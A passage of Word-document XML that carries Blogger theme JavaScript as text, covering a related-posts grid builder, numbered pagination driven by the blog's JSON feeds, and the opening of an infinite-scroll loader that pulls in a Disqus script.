        <w:t xml:space="preserve">                                        c= c + '&lt;div class="col-sm-12 col-xl-6 first"&gt;&lt;div class="pwrap"&gt;&lt;div class="img-thumb"&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;&lt;div class="kit-img" alt="'+title+'" style="background:url('+ pi +')"&gt;&lt;/div&gt;&lt;/a&gt;&lt;div class="tags"&gt;&lt;a href="'+ lu +'" title="See all post having tag '+ lbl +'"&gt;'+ lbl +'&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/imgthumb--&gt;&lt;div class="p-title"&gt;&lt;h3&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;!--TITLE--&gt;&lt;div class="pmeta"&gt;&lt;span class="p-author"&gt;&lt;a href="'+pau+'" title="'+ pa +'"&gt;'+ pa +'&lt;/a&gt;&lt;/span&gt; - &lt;span class="p-time"&gt;'+ time +'&lt;/span&gt;&lt;/div&gt;&lt;!--/pmeta--&gt;&lt;div class="p-desc"&gt;'+ snipt +'...&lt;br/&gt;&lt;a class="mlsa-readmore" href="'+pu+'" title="'+ title +'"&gt;Read More&lt;/a&gt;&lt;/div&gt;&lt;!--pdesc--&gt;&lt;/div&gt;&lt;!--/pwrap--&gt;&lt;/div&gt;&lt;!--/sm6--&gt;&lt;/div&gt;&lt;!--/row--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        if(e.feed.entry.length == 2){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          c = c+ '&lt;/div&gt;&lt;!--/colsm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      case 2:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        c= c + '&lt;div class="row"&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        c = c + '&lt;div class="col-sm-12 col-xl-4 second"&gt;&lt;div class="pwrap"&gt;&lt;div class="img-thumb"&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;&lt;div class="ithumb" style="background:url('+ pi +')"&gt;&lt;/div&gt;&lt;/a&gt;&lt;/div&gt;&lt;!--/imgthumb--&gt;&lt;div class="right-wrap"&gt;&lt;div class="p-title"&gt;&lt;h3&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;!--TITLE--&gt;&lt;div class="pmeta"&gt;&lt;span class="p-time"&gt;'+ time +'&lt;/span&gt;&lt;/div&gt;&lt;!--/pmeta--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/pwrap--&gt;&lt;/div&gt;&lt;!--/sm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        if(e.feed.entry.length == 3){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                                          c = c+ '&lt;/div&gt;&lt;!--/div--&gt;&lt;/div&gt;&lt;!--/colsm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      case 3:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        c= c + '&lt;div class="col-sm-12 col-xl-4 second"&gt;&lt;div class="pwrap"&gt;&lt;div class="img-thumb"&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;&lt;div class="ithumb" style="background:url('+ pi +')"&gt;&lt;/div&gt;&lt;/a&gt;&lt;/div&gt;&lt;!--/imgthumb--&gt;&lt;div class="right-wrap"&gt;&lt;div class="p-title"&gt;&lt;h3&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;!--TITLE--&gt;&lt;div class="pmeta"&gt;&lt;span class="p-time"&gt;'+ time +'&lt;/span&gt;&lt;/div&gt;&lt;!--/pmeta--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/pwrap--&gt;&lt;/div&gt;&lt;!--/sm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        if(e.feed.entry.length == 4){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                          c = c+ '&lt;/div&gt;&lt;!--/div--&gt;&lt;/div&gt;&lt;!--/colsm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                      case 4:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        c = c + '&lt;div class="col-sm-12 col-xl-4 second"&gt;&lt;div class="pwrap"&gt;&lt;div class="img-thumb"&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;&lt;div class="ithumb" style="background:url('+ pi +')"&gt;&lt;/div&gt;&lt;/a&gt;&lt;/div&gt;&lt;!--/imgthumb--&gt;&lt;div class="right-wrap"&gt;&lt;div class="p-title"&gt;&lt;h3&gt;&lt;a href="'+pu+'" title="'+ title +'"&gt;'+ title +'&lt;/a&gt;&lt;/h3&gt;&lt;/div&gt;&lt;!--TITLE--&gt;&lt;div class="pmeta"&gt;&lt;span class="p-time"&gt;'+ time +'&lt;/span&gt;&lt;/div&gt;&lt;!--/pmeta--&gt;&lt;/div&gt;&lt;/div&gt;&lt;!--/pwrap--&gt;&lt;/div&gt;&lt;!--/sm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        c = c+ '&lt;/div&gt;&lt;!--/div--&gt;&lt;/div&gt;&lt;!--/colsm12--&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                        break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    }//switch ct</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    //[END GRID WIDGET]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                    break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                                }//switch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              }//for</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                              $tn.closest('.melesa-plugin').find('.melesa-relative').html(c);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                            }//if feed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                          }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                        });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                      }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    });//next click</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                  });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                }//if entry</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        //]]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;/b:if&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123"/>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">    &lt;b:if cond='data:blog.pageType in {&amp;quot;index&amp;quot;,&amp;quot;archive&amp;quot;}'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">      &lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        //&lt;![CDATA[</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        var $ = jQuery;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        if(pagit == 'number'){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          var postperpage=perpage; var numshowpage=4; var prevpage ='&lt;i class="ion-chevron-left"&gt;&lt;/i&gt;'; var nextpage ='&lt;i class="ion-chevron-right"&gt;&lt;/i&gt;'; var urlactivepage=location.href; var home_page="/";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          function pagination(a) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            var e = "";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            leftnum = parseInt(numshowpage / 2), leftnum == numshowpage - leftnum &amp;&amp; (numshowpage = 2 * leftnum + 1), start = postnumber - leftnum, start &lt; 1 &amp;&amp; (start = 1), maximum = parseInt(a / postperpage) + 1, maximum - 1 == a / postperpage &amp;&amp; (maximum -= 1), end = start + numshowpage - 1, end &gt; maximum &amp;&amp; (end = maximum), e += "&lt;span class='totalpages'&gt;Page " + postnumber + " of " + maximum + "&lt;/span&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            var s = parseInt(postnumber) - 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            postnumber &gt; 1 &amp;&amp; (e += 2 == postnumber ? "page" == type ? '&lt;span class="showpage"&gt;&lt;a href="' + home_page + '"&gt;' + prevpage + "&lt;/a&gt;&lt;/span&gt;" : '&lt;span class="pagenumber"&gt;&lt;a href="/search/label/' + lblname1 + "?&amp;max-results=" + postperpage + '"&gt;' + prevpage + "&lt;/a&gt;&lt;/span&gt;" : "page" == type ? '&lt;span class="pagenumber"&gt;&lt;a href="#" onclick="redirectpage(' + </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>s + ');return false"&gt;' + prevpage + "&lt;/a&gt;&lt;/span&gt;" : '&lt;span class="pagenumber"&gt;&lt;a href="#" onclick="redirectlabel(' + s + ');return false"&gt;' + prevpage + "&lt;/a&gt;&lt;/span&gt;"), start &gt; 1 &amp;&amp; (e += "page" == type ? '&lt;span class="pagenumber"&gt;&lt;a href="' + home_page + '"&gt;1&lt;/a&gt;&lt;/span&gt;' : '&lt;span class="pagenumber"&gt;&lt;a href="/search/label/' + lblname1 + "?&amp;max-results=" + postperpage + '"&gt;1&lt;/a&gt;&lt;/span&gt;'), start &gt; 2 &amp;&amp; (e += "");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            for (var r = start; r &lt;= end; r++) e += postnumber == r ? '&lt;span class="current"&gt;' + r + "&lt;/span&gt;" : 1 == r ? "page" == type ? '&lt;span class="pagenumber"&gt;&lt;a href="' + home_page + '"&gt;1&lt;/a&gt;&lt;/span&gt;' : '&lt;span class="pagenumber"&gt;&lt;a href="/search/label/' + lblname1 + "?&amp;max-results=" + postperpage + '"&gt;1&lt;/a&gt;&lt;/span&gt;' : "page" == type ? '&lt;span class="pagenumber"&gt;&lt;a href="#" onclick="redirectpage(' + r + ');return false"&gt;' + r + "&lt;/a&gt;&lt;/span&gt;" : '&lt;span class="pagenumber"&gt;&lt;a href="#" onclick="redirectlabel(' + r + ');return false"&gt;' + r + "&lt;/a&gt;&lt;/span&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            end &lt; maximum - 1 &amp;&amp; (e += ""), end &lt; maximum &amp;&amp; (e += "page" == type ? '&lt;span class="pagenumber"&gt;&lt;a href="#" onclick="redirectpage(' + maximum + ');return false"&gt;' + maximum + "&lt;/a&gt;&lt;/span&gt;" : '&lt;span class="pagenumber"&gt;&lt;a href="#" onclick="redirectlabel(' + maximum + ');return false"&gt;' + maximum + "&lt;/a&gt;&lt;/span&gt;");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            var n = parseInt(postnumber) + 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            postnumber &lt; maximum &amp;&amp; (e += "page" == type ? '&lt;span class="pagenumber"&gt;&lt;a href="#" onclick="redirectpage(' + n + ');return false"&gt;' + nextpage + "&lt;/a&gt;&lt;/span&gt;" : '&lt;span class="pagenumber"&gt;&lt;a href="#" onclick="redirectlabel(' + n + ');return false"&gt;' + nextpage + "&lt;/a&gt;&lt;/span&gt;");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            for (var t = document.getElementsByName("pageArea"), l = document.getElementById("melesa-pager"), p = 0; p &lt; t.length; p++) t[p].innerHTML = e;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            t &amp;&amp; t.length &gt; 0 &amp;&amp; (e = ""), l &amp;&amp; (l.innerHTML = e)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          function paginationall(a) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            var e = a.feed,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                s = parseInt(e.openSearch$totalResults.$t, 10);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            pagination(s)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          function bloggerpage() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            var a = urlactivepage; - 1 != a.indexOf("/search/label/") &amp;&amp; (lblname1 = -1 != a.indexOf("?updated-max") ? a.substring(a.indexOf("/search/label/") + 14, a.indexOf("?updated-max")) : a.substring(a.indexOf("/search/label/") + 14, a.indexOf("?&amp;max"))), -1 == a.indexOf("?q=") &amp;&amp; -1 == a.indexOf(".html") &amp;&amp; (-1 == a.indexOf("/search/label/") ? (type = "page", postnumber = -1 != urlactivepage.indexOf("#PageNo=") ? urlactivepage.substring(urlactivepage.indexOf("#PageNo=") + 8, urlactivepage.length) : 1, document.write('&lt;script src="' + home_page + </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>'feeds/posts/summary?max-results=1&amp;alt=json-in-script&amp;callback=paginationall"&gt;&lt;\/script&gt;')) : (type = "label", -1 == a.indexOf("&amp;max-results=") &amp;&amp; (postperpage = 20), postnumber = -1 != urlactivepage.indexOf("#PageNo=") ? urlactivepage.substring(urlactivepage.indexOf("#PageNo=") + 8, urlactivepage.length) : 1, document.write('&lt;script src="' + home_page + "feeds/posts/summary/-/" + lblname1 + '?alt=json-in-script&amp;callback=paginationall&amp;max-results=1" &gt;&lt;\/script&gt;')))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          function redirectpage(a) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            jsonstart = (a - 1) * postperpage, nopage = a;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            var e = document.getElementsByTagName("head")[0],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                s = document.createElement("script");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            s.type = "text/javascript", s.setAttribute("src", home_page + "feeds/posts/summary?start-index=" + jsonstart + "&amp;max-results=1&amp;alt=json-in-script&amp;callback=finddatepost"), e.appendChild(s)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          function redirectlabel(a) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            jsonstart = (a - 1) * postperpage, nopage = a;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            var e = document.getElementsByTagName("head")[0],</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                s = document.createElement("script");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            s.type = "text/javascript", s.setAttribute("src", home_page + "feeds/posts/summary/-/" + lblname1 + "?start-index=" + jsonstart + "&amp;max-results=1&amp;alt=json-in-script&amp;callback=finddatepost"), e.appendChild(s)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          function finddatepost(a) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            post = a.feed.entry[0];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            var e = post.published.$t.substring(0, 19) + post.published.$t.substring(23, 29),</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">                s = encodeURIComponent(e);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            if ("page" == type) var r = "/search?updated-max=" + s + "&amp;max-results=" + postperpage + "#PageNo=" + nopage;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            else var r = "/search/label/" + lblname1 + "?updated-max=" + s + "&amp;max-results=" + postperpage + "#PageNo=" + nopage;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            location.href = r</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">          var nopage, type, postnumber, lblname1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          bloggerpage();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        }//if number</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">        if(pagit == 'infinite'){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">          (function($) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            var loadingGif = 'https://lh3.googleusercontent.com/-FiCzyOK4Mew/T4aAj2uVJKI/AAAAAAAAPaY/x23tjGIH7ls/s32/ajax-loader.gif';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            var olderPostsLink = '';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            var loadMoreDiv = null;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            var postContainerSelector = '.melesa-infi';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            var loading = false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            var win = $(window);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            var doc = $(document);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            // Took from jQuery to avoid permission denied error in IE.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            var rscript = /&lt;script\b[^&lt;]*(?:(?!&lt;\/script&gt;)&lt;[^&lt;]*)*&lt;\/script&gt;/gi;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            function loadDisqusScript(domain) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              $.getScript('http://' + domain + '.disqus.com/blogger_index.js');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">            function loadMore() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00760123" w:rsidRDefault="00760123" w:rsidP="00760123">
      <w:r>
        <w:t xml:space="preserve">              $('.melesa-infinite-loading').fadeIn();</w:t>
      </w:r>
    </w:p>
